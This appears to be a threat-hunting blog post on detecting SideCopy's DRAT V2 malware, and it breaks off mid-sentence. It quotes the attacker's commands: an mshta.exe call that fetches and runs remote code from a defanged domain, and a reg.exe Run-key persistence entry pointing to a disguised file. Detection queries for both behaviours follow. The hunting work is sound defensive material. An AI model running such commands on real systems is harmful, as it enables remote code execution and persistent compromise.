177. Hunting for SideCopy's DRAT V2
Hello everyone! Let's look at another example of leveraging ClickFix technique. This time it's SideCopy - a sub-cluster of Transparent Tribe. Recently Recorded Future reported on a new version of DRAT - let's look at some detection and hunting opportunities. First of all, the adversary abuses mshta.exe : C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers: event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: ("http" OR "https") Next - it abuses reg.exe to establishes persistence for DRAT: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf Here we can hunt for adding files located under %PUBLIC% to the Run key, for example: event_typ...